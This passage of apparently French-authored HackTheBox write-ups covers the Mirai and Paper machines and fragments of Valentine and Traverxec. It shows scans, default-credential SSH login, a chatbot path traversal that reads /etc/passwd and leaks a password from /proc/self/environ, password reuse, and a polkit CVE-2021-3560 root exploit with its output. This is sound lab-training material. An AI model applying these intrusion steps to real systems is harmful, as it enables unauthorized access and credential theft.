Manager:/var/lib/lightdm:/bin/false whoopsie:x:105:114::/nonexistent:/bin/false avahi-autoipd:x:106:117:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false avahi:x:107:118:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false usbmux:x:108:46:usbmux daemon,,,:/home/usbmux:/bin/false kernoops:x:109:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false pulse:x:110:119:PulseAudio daemon,,,:/var/run/pulse:/bin/false rtkit:x:111:122:RealtimeKit,,,:/proc:/bin/false speech-dispatcher:x:112:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh hplip:x:113:7:HPLIP system user,,,:/var/run/hplip:/bin/false saned:x:114:123::/home/saned:/bin/false hype:x:1000:1000:Hemorrhage,,,:/home/hype:/bin/bash sshd:x:115:65534::/var/run/sshd:/usr/sbin/nologin hype@Valentine:~$ su firefart Password: firefart@Valentine:/home/hype# whoami firefart firefart@Valentine:/home/hype# cat /root/root.txt ced9.....6598 ","date":"2025-02-12T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/valentine-htb/","title":"HTB | Valentine"},{"content":" Machine name OS IP Difficulty Mirai Linux 10.10.10.48 Easy Enumeration nmap $ nmap -sC -sV -An -T4 -vvv 10.10.10.48 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0) | ssh-hostkey: | 1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA) | ssh-dss | 2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCpSoRAKB+cPR8bChDdajCIpf4p1zHfZyu2xnIkqRAgm6Dws2zcy+VAZriPDRUrht10GfsBLZtp/1PZpkUd2b1PKvN2YIg4SDtpvTrdwAM2uCgUrZdKRoFa+nd8REgkTg8JRYkSGQ/RxBZzb06JZhRSvLABFve3rEPVdwTf4mzzNuryV4DNctrAojjP4Sq7Msc24poQRG9AkeyS1h4zrZMbB0DQaKoyY3pss5FWJ+qa83XNsqjnKlKhSbjH17pBFhlfo/6bGkIE68vS5CQi9Phygke6/a39EP2pJp6WzT5KI3Yosex3Br85kbh/J8CVf4EDIRs5qismW+AZLeJUJHrj | 256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA) | ecdsa-sha2-nistp256 
AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCl89gWp+rA+2SLZzt3r7x+9sXFOCy9g3C9Yk1S21hT/VOmlqYys1fbAvqwoVvkpRvHRzbd5CxViOVih0TeW/bM= | 256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILvYtCvO/UREAhODuSsm7liSb9SZ8gLoZtn7P46SIDZL 53/tcp open domain syn-ack ttl 63 dnsmasq 2.76 | dns-nsid: |_ bind.version: dnsmasq-2.76 80/tcp open http syn-ack ttl 63 lighttpd 1.4.35 |_http-server-header: lighttpd/1.4.35 |_http-title: Site doesn't have a title (text/html; charset=UTF-8). | http-methods: |_ Supported Methods: OPTIONS GET HEAD POST gobuster : Website port 80 In particular, we find a .git directory\n┌──(kali㉿kali)-[~/htb/Mirai/pi_git_repo] └─$ gobuster dir -u http://10.10.10.48/admin -t 50 -w /usr/share/wordlists/dirb/common.txt =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.10.48/admin [+] Method: GET [+] Threads: 50 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /.git/HEAD (Status: 200) [Size: 23] /img (Status: 301) [Size: 0] [--> http://10.10.10.48/admin/img/] /LICENSE (Status: 200) [Size: 14164] /index.php (Status: 200) [Size: 14620] /scripts (Status: 301) [Size: 0] [--> http://10.10.10.48/admin/scripts/] /style (Status: 301) [Size: 0] [--> http://10.10.10.48/admin/style/] Progress: 4614 / 4615 (99.98%) =============================================================== Finished =============================================================== Foothold : Pi Hole Burp 
In the HTTP request, we replace the \"Host: 10.10.10.48\" field with something else, for example \"Host: test\". We then get a response containing page source (whereas originally the response was empty, with no source at all...).\nIn the source, we find a domain name:\n<script src=\"http://pi.hole/admin/scripts/vendor/jquery.min.js\"> We get: pi.hole\nThis suggests:\nFiltering based on the Host header (a common practice with reverse proxies or internal DNS). The server expects requests for a specific domain, probably configured locally. dig We know there is a DNS server on this host (port 53). So, following ippsec (and yes, I did not find this on my own...), we can do:\n┌──(kali㉿kali)-[~/htb/Mirai/pi-hole-3.1.4] └─$ dig @10.10.10.48 pi.hole ; <<>> DiG 9.20.3-1-Debian <<>> @10.10.10.48 pi.hole ; (1 server found) ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 32672 ;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 4096 ;; QUESTION SECTION: ;pi.hole. IN A ;; ANSWER SECTION: pi.hole. 300 IN A 192.168.204.129 ;; Query time: 20 msec ;; SERVER: 10.10.10.48#53(10.10.10.48) (UDP) ;; WHEN: Wed Feb 05 17:08:46 EST 2025 ;; MSG SIZE rcvd: 52 SSH Default Credentials - Raspberry PI After discovering Pi-hole, we deduce that the machine is a Raspberry Pi. The default SSH credentials on a Raspberry Pi are: pi:raspberry\n┌──(kali㉿kali)-[~/htb/Mirai/pi-hole-3.1.4] └─$ ssh pi@10.10.10.48 The authenticity of host '10.10.10.48 (10.10.10.48)' can't be established. 
ED25519 key fingerprint is SHA256:TL7joF/Kz3rDLVFgQ1qkyXTnVQBTYrV44Y2oXyjOa60. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.10.48' (ED25519) to the list of known hosts. pi@10.10.10.48's password: raspberry pi@raspberrypi:~ $ cat Desktop/user.txt ff83.....838d pi@raspberrypi:~ $ Fake root flag pi@raspberrypi:~/python_games $ sudo -l Matching Defaults entries for pi on localhost: env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin User pi may run the following commands on localhost: (ALL : ALL) ALL (ALL) NOPASSWD: ALL pi@raspberrypi:~/python_games $ sudo su root@raspberrypi:/home/pi/python_games# cat /root/root.txt I lost my original root.txt! I think I may have a backup on my USB stick... Restoring Root flag usbstick root@raspberrypi:/media# lsblk NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT sda 8:0 0 10G 0 disk ├─sda1 8:1 0 1.3G 0 part /lib/live/mount/persistence/sda1 └─sda2 8:2 0 8.7G 0 part /lib/live/mount/persistence/sda2 sdb 8:16 0 10M 0 disk /media/usbstick sr0 11:0 1 1024M 0 rom loop0 7:0 0 1.2G 1 loop /lib/live/mount/rootfs/filesystem.squashfs root@raspberrypi:/media/usbstick# cat damnit.txt lost+found/ root@raspberrypi:/media/usbstick# cat damnit.txt Damnit! Sorry man I accidentally deleted your files off the USB stick. Do you know if there is any way to get them back? -James ------------------------------------------------------- ## We could also have done: root@raspberrypi:~# df -lh Filesystem Size Used Avail Use% Mounted on aufs 8.5G 2.8G 5.3G 35% / tmpfs 100M 13M 88M 13% /run /dev/sda1 1.3G 1.3G 0 100% /lib/live/mount/persistence/sda1 /dev/loop0 1.3G 1.3G 0 100% /lib/live/mount/rootfs/filesystem.squashfs ... 
/dev/sdb 8.7M 93K 7.9M 2% /media/usbstick tmpfs 50M 0 50M 0% /run/user/999 tmpfs 50M 0 50M 0% /run/user/1000 root@raspberrypi:~# mount sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime) proc on /proc type proc (rw,nosuid,nodev,noexec,relatime) tmpfs on /run type tmpfs (rw,nosuid,relatime,size=102396k,mode=755) ... ... /dev/sdb on /media/usbstick type ext4 (ro,nosuid,nodev,noexec,relatime,data=ordered) ... Creating image of the usb key root@raspberrypi:~# dd if=/dev/sdb of=/root/usbstick.img bs=4M 2+1 records in 2+1 records out 10485760 bytes (10 MB) copied, 0.0202228 s, 519 MB/s forensics on the img Using the strings command (no need even for Autopsy...), we quickly find the flag in the USB stick image.\nroot@raspberrypi:~# strings usbstick.img >r & /media/usbstick lost+found root.txt damnit.txt >r & >r & /media/usbstick lost+found root.txt damnit.txt >r & /media/usbstick 2]8^ lost+found root.txt damnit.txt >r & 3d3e.....020b <<<<<<<<<<<<<<< HERE IT IS Damnit! Sorry man I accidentally deleted your files off the USB stick. Do you know if there is any way to get them back? -James BONUS We could have run strings directly on the USB stick's block device... that works too!\nroot@raspberrypi:~# strings /dev/sdb >r & /media/usbstick lost+found root.txt damnit.txt >r & >r & /media/usbstick lost+found root.txt damnit.txt >r & /media/usbstick 2]8^ lost+found root.txt damnit.txt >r & 3d3e.....020b Damnit! Sorry man I accidentally deleted your files off the USB stick. 
Do you know if there is any way to get them back? -James ","date":"2025-02-06T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/mirai-htb/","title":"HTB | Mirai"},{"content":" Machine name OS IP Difficulty Paper Linux 10.10.11.143 Easy Enumeration nmap ┌──(kali㉿kali)-[~] └─$ nmap -sC -sV -An -p- -vvv -T4 10.10.11.143 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-24 06:38 EST ... ... Nmap scan report for 10.10.11.143 Host is up, received echo-reply ttl 63 (0.018s latency). Scanned at 2025-01-24 06:38:11 EST for 35s Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 8.0 (protocol 2.0) | ssh-hostkey: | 2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDcZzzauRoUMdyj6UcbrSejflBMRBeAdjYb2Fkpkn55uduA3qShJ5SP33uotPwllc3wESbYzlB9bGJVjeGA2l+G99r24cqvAsqBl0bLStal3RiXtjI/ws1E3bHW1+U35bzlInU7AVC9HUW6IbAq+VNlbXLrzBCbIO+l3281i3Q4Y2pzpHm5OlM2mZQ8EGMrWxD4dPFFK0D4jCAKUMMcoro3Z/U7Wpdy+xmDfui3iu9UqAxlu4XcdYJr7Iijfkl62jTNFiltbym1AxcIpgyS2QX1xjFlXId7UrJOJo3c7a0F+B3XaBK5iQjpUfPmh7RLlt6CZklzBZ8wsmHakWpysfXN | 256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBE/Xwcq0Gc4YEeRtN3QLduvk/5lezmamLm9PNgrhWDyNfPwAXpHiu7H9urKOhtw9SghxtMM2vMIQAUh/RFYgrxg= | 256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKdmmhk1vKOrAmcXMPh0XRA5zbzUHt1JBbbWwQpI4pEX 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9) | http-methods: | Supported Methods: POST OPTIONS HEAD GET TRACE |_ Potentially risky methods: TRACE |_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9 |_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28 |_http-title: 
HTTP Server Test Page powered by CentOS 443/tcp open ssl/http syn-ack ttl 63 Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9) | tls-alpn: |_ http/1.1 |_http-title: HTTP Server Test Page powered by CentOS |_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28 | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US/emailAddress=root@localhost.localdomain | Subject Alternative Name: DNS:localhost.localdomain | Issuer: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US/emailAddress=root@localhost.localdomain/organizationalUnitName=ca-3899279223185377061 | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2021-07-03T08:52:34 | Not valid after: 2022-07-08T10:32:34 | MD5: 579a:92bd:803c:ac47:d49c:5add:e44e:4f84 | SHA-1: 61a2:301f:9e5c:2603:a643:00b5:e5da:5fd5:c175:f3a9 | -----BEGIN CERTIFICATE----- | MIIE4DCCAsigAwIBAgIIdryw6eirdUUwDQYJKoZIhvcNAQELBQAwgY8xCzAJBgNV | BAYTAlVTMRQwEgYDVQQKDAtVbnNwZWNpZmllZDEfMB0GA1UECwwWY2EtMzg5OTI3 | mh/ptg== |_-----END CERTIFICATE----- | http-methods: | Supported Methods: POST OPTIONS HEAD GET TRACE |_ Potentially risky methods: TRACE |_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9 |_ssl-date: TLS randomness does not represent time Foothold office.paper Using Burp, we observe an HTTP response carrying the header \"Backend-server: office.paper\". 
Adding it to /etc/hosts gives access to a new web page.\ndirsearch gobuster dir -u http://office.paper -t 50 -w /usr/share/wordlists/dirb/common.txt =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://office.paper [+] Method: GET [+] Threads: 50 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /.htaccess (Status: 403) [Size: 199] /.htpasswd (Status: 403) [Size: 199] /.hta (Status: 403) [Size: 199] /cgi-bin/ (Status: 403) [Size: 199] /manual (Status: 301) [Size: 235] [--> http://office.paper/manual/] /index.php (Status: 301) [Size: 1] [--> http://office.paper/] /wp-admin (Status: 301) [Size: 237] [--> http://office.paper/wp-admin/] /wp-content (Status: 301) [Size: 239] [--> http://office.paper/wp-content/] /wp-includes (Status: 301) [Size: 240] [--> http://office.paper/wp-includes/] Progress: 4614 / 4615 (99.98%) =============================================================== Finished =============================================================== wordpress With dirsearch we observe a WordPress login page --> /wp-admin\nwp-scan We observe: WordPress version 5.2.3 identified (Insecure, released on 2019-09-04).\n$ wpscan --url http://office.paper 
_______________________________________________________________ __ _______ _____ \\ \\ / / __ \\ / ____| \\ \\ /\\ / /| |__) | (___ ___ __ _ _ __ ® \\ \\/ \\/ / | ___/ \\___ \\ / __|/ _` | '_ \\ \\ /\\ / | | ____) | (__| (_| | | | | \\/ \\/ |_| |_____/ \\___|\\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.27 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [+] URL: http://office.paper/ [10.10.11.143] [+] Started: Thu Jan 30 10:22:59 2025 Interesting Finding(s): [+] Headers | Interesting Entries: | - Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9 | - X-Powered-By: PHP/7.2.24 | - X-Backend-Server: office.paper | Found By: Headers (Passive Detection) | Confidence: 100% [+] WordPress readme found: http://office.paper/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] WordPress version 5.2.3 identified (Insecure, released on 2019-09-04). | Found By: Rss Generator (Passive Detection) | - http://office.paper/index.php/feed/, <generator>https://wordpress.org/?v=5.2.3</generator> | - http://office.paper/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.3</generator> [+] WordPress theme in use: construction-techup | Location: http://office.paper/wp-content/themes/construction-techup/ | Last Updated: 2022-09-22T00:00:00.000Z | Readme: http://office.paper/wp-content/themes/construction-techup/readme.txt | [!] The version is out of date, the latest version is 1.5 | Style URL: http://office.paper/wp-content/themes/construction-techup/style.css?ver=1.1 | Style Name: Construction Techup | Description: Construction Techup is child theme of Techup a Free WordPress Theme useful for Business, corporate a... 
| Author: wptexture | Author URI: https://testerwp.com/ | | Found By: Css Style In Homepage (Passive Detection) | | Version: 1.1 (80% confidence) | Found By: Style (Passive Detection) | - http://office.paper/wp-content/themes/construction-techup/style.css?ver=1.1, Match: \u0026#39;Version: 1.1\u0026#39; [+] Enumerating All Plugins (via Passive Methods) [i] No plugins Found. [+] Enumerating Config Backups (via Passive and Aggressive Methods) Checking Config Backups - Time: 00:00:00 \u0026lt;====================================================================================================================================================\u0026gt; (137 / 137) 100.00% Time: 00:00:00 [i] No Config Backups Found. [!] No WPScan API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register [+] Finished: Thu Jan 30 10:23:06 2025 [+] Requests Done: 169 [+] Cached Requests: 5 [+] Data Sent: 42.416 KB [+] Data Received: 167.972 KB [+] Memory used: 280.184 MB [+] Elapsed time: 00:00:07 Viewing unauthenticated posts.md http://office.paper/?static=1\u0026order=desc\nPermet d\u0026rsquo;afficher des messages cachés normalement non accessible. C\u0026rsquo;est une vulnerabilité de wordpress 5.2.3 :\nVuln: Wordpress \u0026lt;=5.2.3: viewing unauthenticated posts.md\nOn trouve le message suivant qui semble intéressant :\n1 2 ## Secret Registration URL of new Employee chat system http://chat.office.paper/register/8qozr226AhkCHZdyY On arrive sur une page, où l\u0026rsquo;on peut créer un compte rapidement et on obtient l\u0026rsquo;accès à une sorte de discord avec un chat: L\u0026rsquo;application RocketChat.\nRocketChat bot En fouillant on voit qu\u0026rsquo;il existe un profil avec un bot, on peut discuter avec lui. Avec la commande help on voit une commande qui permet d\u0026rsquo;afficher des fichiers. 
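The bot's file command, as the traversal below shows, hands its argument to cat under /home/dwight/sales/ without confining the result to that directory, which is what turns a "show me a sales file" helper into an arbitrary file read. The following is an added example, not the writeup's or Hubot's own code: a minimal Python version of such a handler next to a hardened one that resolves the path and refuses anything escaping the base directory. The base directory, the file names and their contents are constructed for the demo.

```python
import subprocess
import tempfile
from pathlib import Path

# Constructed sandbox standing in for the bot's base directory /home/dwight/sales
# (assumption for the demo: nothing here is the real box or Hubot's own code).
ROOT = Path(tempfile.mkdtemp(prefix="recyclops-demo-"))
SALES_DIR = ROOT / "sales"
SALES_DIR.mkdir()
(SALES_DIR / "q1.txt").write_text("Q1 sales: 42 reams of A4\n")
# Stands in for /etc/passwd or /proc/self/environ: readable, but outside the sales directory.
(ROOT / "outside-secret.txt").write_text("ROCKETCHAT_PASSWORD=constructed-demo-value\n")


def vulnerable_file_command(name: str) -> str:
    """What the bot effectively does: glue the user's argument onto the base
    directory and hand the result to cat. A '../' in the argument walks out."""
    path = f"{SALES_DIR}/{name}"
    proc = subprocess.run(["cat", path], capture_output=True, text=True)
    return proc.stdout if proc.returncode == 0 else proc.stderr.strip()


def safe_file_command(name: str) -> str:
    """Hardened version: resolve '..' and symlinks first, then require the
    resolved target to still be inside SALES_DIR, and read it in-process
    (no shell, no external command to feed)."""
    base = SALES_DIR.resolve()
    target = (base / name).resolve()   # an absolute name also ends up outside base
    try:
        target.relative_to(base)       # raises ValueError unless target is under base
    except ValueError:
        return "refused: path escapes the sales directory"
    if not target.is_file():
        return f"no such file: {name}"
    return target.read_text()


if __name__ == "__main__":
    print(vulnerable_file_command("../outside-secret.txt"), end="")  # leaks the secret
    print(safe_file_command("../outside-secret.txt"))                # refused
```

The containment test is the point: a plain string prefix check on the resolved path would still accept a sibling directory such as sales-archive, and checking before resolving would miss symlinks planted inside the base directory.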
This command calls cat to display any file. The argument is simply appended to /home/dwight/sales/, so we can use it like an LFI (strictly speaking a path traversal giving arbitrary file read) to display the content of any file the bot's user can read:

recyclops file test.txt
cat: /home/dwight/sales/test.txt: No such file or directory

recyclops file ../../../etc/passwd
<!=====Contents of file ../../../etc/passwd=====>
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:65534:65534:Kernel Overflow User:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
systemd-coredump:x:999:997:systemd Core Dumper:/:/sbin/nologin
systemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
polkitd:x:998:996:User for polkitd:/:/sbin/nologin
geoclue:x:997:994:User for geoclue:/var/lib/geoclue:/sbin/nologin
rtkit:x:172:172:RealtimeKit:/proc:/sbin/nologin
qemu:x:107:107:qemu user:/:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
cockpit-ws:x:996:993:User for cockpit-ws:/:/sbin/nologin
pulse:x:171:171:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin
unbound:x:995:990:Unbound DNS resolver:/etc/unbound:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
gluster:x:994:989:GlusterFS daemons:/run/gluster:/sbin/nologin
chrony:x:993:987::/var/lib/chrony:/sbin/nologin
libstoragemgmt:x:992:986:daemon account for libstoragemgmt:/var/run/lsm:/sbin/nologin
saslauth:x:991:76:Saslauthd user:/run/saslauthd:/sbin/nologin
dnsmasq:x:985:985:Dnsmasq DHCP and DNS server:/var/lib/dnsmasq:/sbin/nologin
radvd:x:75:75:radvd user:/:/sbin/nologin
clevis:x:984:983:Clevis Decryption Framework unprivileged user:/var/cache/clevis:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
sssd:x:983:981:User for sssd:/:/sbin/nologin
colord:x:982:980:User for colord:/var/lib/colord:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
setroubleshoot:x:981:979::/var/lib/setroubleshoot:/sbin/nologin
pipewire:x:980:978:PipeWire System Daemon:/var/run/pipewire:/sbin/nologin
gdm:x:42:42::/var/lib/gdm:/sbin/nologin
gnome-initial-setup:x:979:977::/run/gnome-initial-setup/:/sbin/nologin
insights:x:978:976:Red Hat Insights:/var/lib/insights:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/sbin/nologin
nginx:x:977:975:Nginx web server:/var/lib/nginx:/sbin/nologin
mongod:x:976:974:mongod:/var/lib/mongo:/bin/false
rocketchat:x:1001:1001::/home/rocketchat:/bin/bash
dwight:x:1004:1004::/home/dwight:/bin/bash
<!=====End of file ../../../etc/passwd=====>

/proc/self/environ: environment variables

Since the bot runs cat, /proc/self refers to that cat process, which inherits the bot's environment. We can therefore display the environment variables (and other information about the process) through the files under /proc/self. Both cmdline and environ are NUL-separated, which is why the fields run together in the chat output.

recyclops file ../../../proc/self/cmdline
#################################################
Bot 7:05 PM
<!=====Contents of file ../../../proc/self/cmdline=====>
cat/home/dwight/sales/../../../proc/self/cmdline
<!=====End of file ../../../proc/self/cmdline=====>

recyclops file ../../../proc/self/environ
#################################################
Bot 7:07 PM
<!=====Contents of file ../../../proc/self/environ=====>
(one field per line here; the bot prints them joined)
RESPOND_TO_EDITED=true
ROCKETCHAT_USER=recyclops
LANG=en_US.UTF-8
OLDPWD=/home/dwight/hubot
ROCKETCHAT_URL=http://127.0.0.1:48320
ROCKETCHAT_USESSL=false
XDG_SESSION_ID=1
USER=dwight
RESPOND_TO_DM=true
PWD=/home/dwight/hubot
HOME=/home/dwight
PORT=8000
ROCKETCHAT_PASSWORD=Queenofblad3s!23
SHELL=/bin/sh
SHLVL=4
BIND_ADDRESS=127.0.0.1
LOGNAME=dwight
DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1004/bus
XDG_RUNTIME_DIR=/run/user/1004
PATH=/home/dwight/hubot/node_modules/coffeescript/bin:node_modules/.bin:node_modules/hubot/node_modules/.bin:/usr/bin:/bin
_=/usr/bin/cat
<!=====End of file ../../../proc/self/environ=====>

We obtain the bot's Rocket.Chat credentials (ROCKETCHAT_USER / ROCKETCHAT_PASSWORD): recyclops : Queenofblad3s!23

After checking, we cannot log in over SSH with that user and password. The credentials do work on the web platform, but a message tells us that logging in to the web interface with a bot account is forbidden.

SSH : dwight

The environment also shows that the bot runs as dwight (USER=dwight, HOME=/home/dwight), so password reuse is worth a try. The bot's password works for the user dwight over SSH: dwight : Queenofblad3s!23

ssh dwight@office.paper
dwight@office.paper's password:
Activate the web console with: systemctl enable --now cockpit.socket

Last failed login: Thu Jan 30 18:24:37 EST 2025 from 10.10.14.42 on ssh:notty
There were 3 failed login attempts since the last successful login.
Last login: Tue Feb  1 09:14:33 2022 from 10.10.14.23
[dwight@paper ~]$ cat user.txt
4419.....697b

Privilege Escalation

CVE-2021-3560 : polkit

With linpeas, we find a privilege escalation through a flaw in polkit, CVE-2021-3560:

./linpeas.sh
...
Vulnerable to CVE-2021-3560
...
We find a PoC on GitHub with a .sh script: https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation

At first it does not work: the password of the newly created user must be equivalent to the current one, but that was not the case. By specifying the parameter -p=a, the exploit works without any problem. (I mention it because I had given up on this CVE because of that... I thought it was not the intended solution for the box.)

[dwight@paper ~]$ ./exploit.sh -p=a
[!] Username set as : secnigma
[!] No Custom Timing specified.
[!] Timing will be detected Automatically
[!] Force flag not set.
[!] Vulnerability checking is ENABLED!
[!] Starting Vulnerability Checks...
[!] Checking distribution...
[!] Detected Linux distribution as "centos"
[!] Checking if Accountsservice and Gnome-Control-Center is installed
[+] Accounts service and Gnome-Control-Center Installation Found!!
[!] Checking if polkit version is vulnerable
[+] Polkit version appears to be vulnerable!!
[!] Starting exploit...
[!] Inserting Username secnigma...
Error org.freedesktop.Accounts.Error.PermissionDenied: Authentication is required
[+] Inserted Username secnigma with UID 1005!
[!] Inserting password hash...
[!] It looks like the password insertion was succesful!
[!] Try to login as the injected user using su - secnigma
[!] When prompted for password, enter your password
[!] If the username is inserted, but the login fails; try running the exploit again.
[!] If the login was succesful,simply enter 'sudo bash' and drop into a root shell!
[dwight@paper ~]$ su - secnigma
Password:
[secnigma@paper ~]$ whoami
secnigma
[secnigma@paper ~]$ sudo bash
[sudo] password for secnigma:
[root@paper secnigma]# cat /root/root.txt
ccbf.....2804
","date":"2025-02-01T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/paper-htb/","title":"HTB | Paper"},{"content":" Machine name: Traverxec | OS: Linux | IP: 10.10.10.165 | Difficulty: Easy
Users: david : Nowonly4me

Enumeration

nmap

┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV -An -T4 -vvv 10.10.10.165
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDVWo6eEhBKO19Owd6sVIAFVCJjQqSL4g16oI/DoFwUo+ubJyyIeTRagQNE91YdCrENXF2qBs2yFj2fqfRZy9iqGB09VOZt6i8oalpbmFwkBDtCdHoIAZbaZFKAl+m1UBell2v0xUhAy37Wl9BjoUU3EQBVF5QJNQqvb/mSqHsi5TAJcMtCpWKA4So3pwZcTatSu5x/RYdKzzo9fWSS6hjO4/hdJ4BM6eyKQxa29vl/ea1PvcHPY5EDTRX5RtraV9HAT7w2zIZH5W6i3BQvMGEckrrvVTZ6Ge3Gjx00ORLBdoVyqQeXQzIJ/vuDuJOH2G6E/AHDsw3n5yFNMKeCvNNL
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLpsS/IDFr0gxOgk9GkAT0G4vhnRdtvoL8iem2q8yoRCatUIib1nkp5ViHvLEgL6e3AnzUJGFLI3TFz+CInilq4=
|   256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGJ16OMR0bxc/4SAEl1yiyEUxC3i/dFH7ftnCU7+P+3s
80/tcp open  http    syn-ack nostromo 1.9.6
| http-methods:
|_  Supported Methods: GET HEAD POST
|_http-server-header: nostromo 1.9.6
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
|_http-title: TRAVERXEC

Foothold

CVE-2019-16278 - RCE

